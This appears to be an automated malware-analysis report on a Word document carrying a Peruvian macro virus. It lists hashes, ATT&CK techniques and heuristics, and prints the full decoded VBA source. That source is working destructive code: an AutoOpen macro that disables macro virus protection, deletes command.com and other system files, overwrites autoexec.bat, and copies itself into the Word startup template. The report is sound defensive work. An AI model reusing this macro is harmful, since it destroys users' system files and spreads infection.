Office (OLE) malware analysis — malicious · a1f883b558bc6a66

MALICIOUS

Office (OLE)

38.0 KB Created: 2000-04-25 05:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 93d42ccd810e202e31a4b470e5582294 SHA-1: 3cb881a072a20f5882f5ad08e06284c3758209a2 SHA-256: a1f883b558bc6a666ec2f6f4d9d2f3bdb55c754e503a56a9b8033cb2216e734b

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen subroutine, indicating it is designed to execute malicious code upon opening. The script attempts to disable virus protection and then proceeds to delete existing files and create a new 'autoexec.bat' file. This suggests the macro is intended to download and execute a second-stage payload, likely disguised as 'winfile.exe', in the Windows directory.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8728 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	8728 bytes
SHA-256: `d212bfb9fe8ed4ee6b0e6040c906801f5cae74fe99ae3b31c2a2187c97a4138c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub CommandButton1_Click() End Sub Attribute VB_Name = "Módulo1" Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long Sub AutoOpen() On Error GoTo RutinaDeError Options.VirusProtection = False System.ProfileString("Options", "EnableMacroVirusProtection") = "0" ShowVisualBasicEditor = False Dim DirName As String Dim Shinji As String DirName = Donde_esta_Windows() Shinji = DirName Kill (Shinji + "winfile.exe") Kill (Shinji + "command.com") Kill (Shinji + "SYSTEM\APPWIZ.cpl") Open "c:\autoexec.bat" For Output As #1 Print #1, "@echo off" Print #1, "cls" Print #1, "ECHO ********************************************************" Print #1, "ECHO " Print #1, "ECHO ViRuS: ASUKA ANTI - T " Print #1, "ECHO " Print #1, "ECHO AUTOR: " Print #1, "ECHO " Print #1, "ECHO ©©©© DarK OmEGA ©©©© " Print #1, "ECHO " Print #1, "ECHO LIMA - PERU " Print #1, "ECHO " Print #1, "ECHO 16/FEB/00 " Print #1, "ECHO " Print #1, "ECHO ®®®®®®®®®®®®®® " Print #1, "ECHO § § " Print #1, "ECHO § A.B.G § " Print #1, "ECHO ********************************************************" Print #1, "pause" Close #1 ActiveDocument.SaveAs FileName:=Application.StartupPath & "\word8.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False RutinaDeError: Exit Sub End Sub Function Donde_esta_Windows() As String Dim Temp As String Dim Ret As Long Const MAX_LENGTH = 145 Temp = String$(MAX_LENGTH, 0) Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH) Temp = Left$(Temp, Ret) If Temp <> "" And Right$(Temp, 1) <> "\" Then Donde_esta_Windows = Temp & "\" Else Donde_esta_Windows = Temp End If End Function ' Processing file: /opt/analyzer/scan_staging/d06a2e69e2c64133beb83a7f527c2962.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 1143 bytes ' Line #0: ' Line #1: ' FuncDefn (Private Sub CommandButton1_Click()) ' Line #2: ' Line #3: ' EndSub ' Macros/VBA/Módulo1 - 6238 bytes ' Line #0: ' FuncDefn (Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long) ' Line #1: ' Line #2: ' FuncDefn (Sub AutoOpen()) ' Line #3: ' OnError RutinaDeError ' Line #4: ' LitVarSpecial (False) ' Ld Options ' MemSt VirusProtection ' Line #5: ' LitStr 0x0001 "0" ' LitStr 0x0007 "Options" ' LitStr 0x001A "EnableMacroVirusProtection" ' Ld System ' ArgsMemSt ProfileString 0x0002 ' Line #6: ' LitVarSpecial (False) ' St ShowVisualBasicEditor ' Line #7: ' Dim ' VarDefn DirName (As String) ' Line #8: ' Dim ' VarDefn Shinji (As String) ' Line #9: ' ArgsLd Donde_esta_Windows 0x0000 ' St DirName ' Line #10: ' Ld DirName ' St Shinji ' Line #11: ' Ld Shinji ' LitStr 0x000B "winfile.e ... (truncated)

SHA-256: d212bfb9fe8ed4ee6b0e6040c906801f5cae74fe99ae3b31c2a2187c97a4138c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub CommandButton1_Click()

End Sub

Attribute VB_Name = "Módulo1"
Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long

Sub AutoOpen()
On Error GoTo RutinaDeError
Options.VirusProtection = False
System.ProfileString("Options", "EnableMacroVirusProtection") = "0"
ShowVisualBasicEditor = False
Dim DirName As String
Dim Shinji As String
    DirName = Donde_esta_Windows()
    Shinji = DirName
Kill (Shinji + "winfile.exe")
Kill (Shinji + "command.com")
Kill (Shinji + "SYSTEM\APPWIZ.cpl")
Open "c:\autoexec.bat" For Output As #1
Print #1, "@echo off"
Print #1, "cls"
Print #1, "ECHO          *********************************************************"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ViRuS: ASUKA  ANTI - T               *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                         AUTOR:                        *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                  ©©©© DarK OmEGA  ©©©©                *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                      LIMA - PERU                      *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                       16/FEB/00                       *"
Print #1, "ECHO          *                                                       *"
Print #1, "ECHO          *                     ®®®®®®®®®®®®®®                    *"
Print #1, "ECHO          *                     §            §                    *"
Print #1, "ECHO          *                     §   A.B.G    §                    *"
Print #1, "ECHO          *********************************************************"
Print #1, "pause"
Close #1
ActiveDocument.SaveAs FileName:=Application.StartupPath & "\word8.dot", FileFormat:=wdFormatTemplate, AddToRecentFiles:=False, ReadOnlyRecommended:=False
RutinaDeError:
Exit Sub
End Sub

Function Donde_esta_Windows() As String
    Dim Temp As String
    Dim Ret As Long
    Const MAX_LENGTH = 145

    Temp = String$(MAX_LENGTH, 0)
    Ret = Donde_esta_Windowsdirectory(Temp, MAX_LENGTH)
    Temp = Left$(Temp, Ret)
    If Temp <> "" And Right$(Temp, 1) <> "\" Then
        Donde_esta_Windows = Temp & "\"
    Else
        Donde_esta_Windows = Temp
    End If
End Function

' Processing file: /opt/analyzer/scan_staging/d06a2e69e2c64133beb83a7f527c2962.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1143 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Private Sub CommandButton1_Click())
' Line #2:
' Line #3:
' 	EndSub 
' Macros/VBA/Módulo1 - 6238 bytes
' Line #0:
' 	FuncDefn (Private Declare Function Donde_esta_Windowsdirectory Lib "kernel32" (ByVal lpBuffer As String, ByVal nSize As Long) As Long)
' Line #1:
' Line #2:
' 	FuncDefn (Sub AutoOpen())
' Line #3:
' 	OnError RutinaDeError 
' Line #4:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #5:
' 	LitStr 0x0001 "0"
' 	LitStr 0x0007 "Options"
' 	LitStr 0x001A "EnableMacroVirusProtection"
' 	Ld System 
' 	ArgsMemSt ProfileString 0x0002 
' Line #6:
' 	LitVarSpecial (False)
' 	St ShowVisualBasicEditor 
' Line #7:
' 	Dim 
' 	VarDefn DirName (As String)
' Line #8:
' 	Dim 
' 	VarDefn Shinji (As String)
' Line #9:
' 	ArgsLd Donde_esta_Windows 0x0000 
' 	St DirName 
' Line #10:
' 	Ld DirName 
' 	St Shinji 
' Line #11:
' 	Ld Shinji 
' 	LitStr 0x000B "winfile.e
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.